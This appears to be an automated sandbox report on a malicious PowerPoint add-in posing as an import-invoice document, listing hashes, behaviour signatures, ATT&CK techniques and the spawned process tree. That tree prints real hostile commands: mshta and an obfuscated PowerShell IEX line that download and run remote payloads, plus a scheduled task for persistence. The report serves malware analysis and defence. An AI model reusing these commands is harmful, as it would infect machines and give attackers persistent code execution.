Analysis

  • max time kernel
    118s
  • max time network
    118s
  • platform
    windows7_x64
  • resource
    win7-en-20211014
  • submitted
    19-10-2021 08:22

General

  • Target

    Import Invoice Duty and Clearance.ppam

  • Size

    8KB

  • MD5

    7659d46dbf1d34e7833e4b0b2968f281

  • SHA1

    05f65097aefb7a9c8269ef63d7aec4764079b970

  • SHA256

    0cabc6544bb554fc6900c766ade30bee9bd403f64231e87b65fc9182128d7515

  • SHA512

    db5f925cd241e429593c18148f9b9ded717ef87bf935a9d134579d1139c23292201803104910896ef4ecde4891735690b2826f82cefb6762d61763244e94e4ec

Score
10/10

Malware Config

Signatures

  • Process spawned unexpected child process 1 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • Blocklisted process makes network request 15 IoCs
  • Adds Run key to start application 2 TTPs 5 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Office loads VBA resources, possible macro or embedded object present
  • Creates scheduled task(s) 1 TTPs 1 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Kills process with taskkill 2 IoCs
  • Modifies Internet Explorer settings 1 TTPs 10 IoCs
  • Modifies registry class 64 IoCs
  • Modifies system certificate store 2 TTPs 2 IoCs
  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 3 IoCs
  • Suspicious use of FindShellTrayWindow 1 IoCs
  • Suspicious use of WriteProcessMemory 24 IoCs

Processes

  • C:\Program Files (x86)\Microsoft Office\Office14\POWERPNT.EXE
    "C:\Program Files (x86)\Microsoft Office\Office14\POWERPNT.EXE" "C:\Users\Admin\AppData\Local\Temp\Import Invoice Duty and Clearance.ppam"
    1⤵
    • Modifies Internet Explorer settings
    • Modifies registry class
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious use of FindShellTrayWindow
    • Suspicious use of WriteProcessMemory
    PID:888
    • C:\Windows\splwow64.exe
      C:\Windows\splwow64.exe 12288
      2⤵
        PID:524
      • C:\Windows\SysWOW64\mshta.exe
        "C:\Windows\System32\mshta.exe" https://www.bitly.com/ajdwwdwdrufhjwijjd
        2⤵
        • Process spawned unexpected child process
        • Blocklisted process makes network request
        • Adds Run key to start application
        • Modifies Internet Explorer settings
        • Modifies system certificate store
        • Suspicious use of WriteProcessMemory
        PID:1824
        • C:\Windows\SysWOW64\taskkill.exe
          "C:\Windows\System32\taskkill.exe" /f /im winword.exe
          3⤵
          • Kills process with taskkill
          • Suspicious use of AdjustPrivilegeToken
          PID:1968
        • C:\Windows\SysWOW64\taskkill.exe
          "C:\Windows\System32\taskkill.exe" /f /im Excel.exe
          3⤵
          • Kills process with taskkill
          • Suspicious use of AdjustPrivilegeToken
          PID:1504
        • C:\Windows\SysWOW64\schtasks.exe
          "C:\Windows\System32\schtasks.exe" /create /sc MINUTE /mo 80 /tn ""Bluefibonashi"" /F /tr ""\""MsHtA""\""http://1230948%[email protected]/p/13.html\""
          3⤵
          • Creates scheduled task(s)
          PID:1676
        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w h I`E`X([System.IO.StreamReader]::new( [System.Net.WebRequest]::Create('https://92c49223-b37f-4157-904d-daf4679f14d5.usrfiles.com/ugd/92c492_8f22087a2c0740eba07c3aea05e107e7.txt').GetResponse().GetResponseStream()).ReadToend());I`E`X([System.IO.StreamReader]::new( [System.Net.WebRequest]::Create('https://92c49223-b37f-4157-904d-daf4679f14d5.usrfiles.com/ugd/92c492_959babd593ed4cd49dd3b6a0f1146d59.txt').GetResponse().GetResponseStream()).ReadToend());
          3⤵
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:852

    Network

    MITRE ATT&CK Matrix ATT&CK v6

    Execution

    Scheduled Task

    1
    T1053

    Persistence

    Registry Run Keys / Startup Folder

    1
    T1060

    Scheduled Task

    1
    T1053

    Privilege Escalation

    Scheduled Task

    1
    T1053

    Defense Evasion

    Modify Registry

    3
    T1112

    Install Root Certificate

    1
    T1130

    Discovery

    System Information Discovery

    1
    T1082

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • memory/524-57-0x0000000000000000-mapping.dmp
    • memory/524-58-0x000007FEFC291000-0x000007FEFC293000-memory.dmp
      Filesize

      8KB

    • memory/852-67-0x0000000000000000-mapping.dmp
    • memory/852-71-0x0000000002300000-0x0000000002F4A000-memory.dmp
      Filesize

      12.3MB

    • memory/852-72-0x0000000002300000-0x0000000002F4A000-memory.dmp
      Filesize

      12.3MB

    • memory/852-70-0x0000000002300000-0x0000000002F4A000-memory.dmp
      Filesize

      12.3MB

    • memory/888-54-0x0000000074A51000-0x0000000074A55000-memory.dmp
      Filesize

      16KB

    • memory/888-62-0x000000005FFF0000-0x0000000060000000-memory.dmp
      Filesize

      64KB

    • memory/888-56-0x000000005FFF0000-0x0000000060000000-memory.dmp
      Filesize

      64KB

    • memory/888-60-0x0000000005780000-0x0000000005782000-memory.dmp
      Filesize

      8KB

    • memory/888-59-0x0000000075D31000-0x0000000075D33000-memory.dmp
      Filesize

      8KB

    • memory/888-55-0x0000000071A81000-0x0000000071A83000-memory.dmp
      Filesize

      8KB

    • memory/1504-65-0x0000000000000000-mapping.dmp
    • memory/1676-66-0x0000000000000000-mapping.dmp
    • memory/1824-61-0x0000000000000000-mapping.dmp
    • memory/1824-69-0x0000000004030000-0x0000000004031000-memory.dmp
      Filesize

      4KB

    • memory/1968-64-0x0000000000000000-mapping.dmp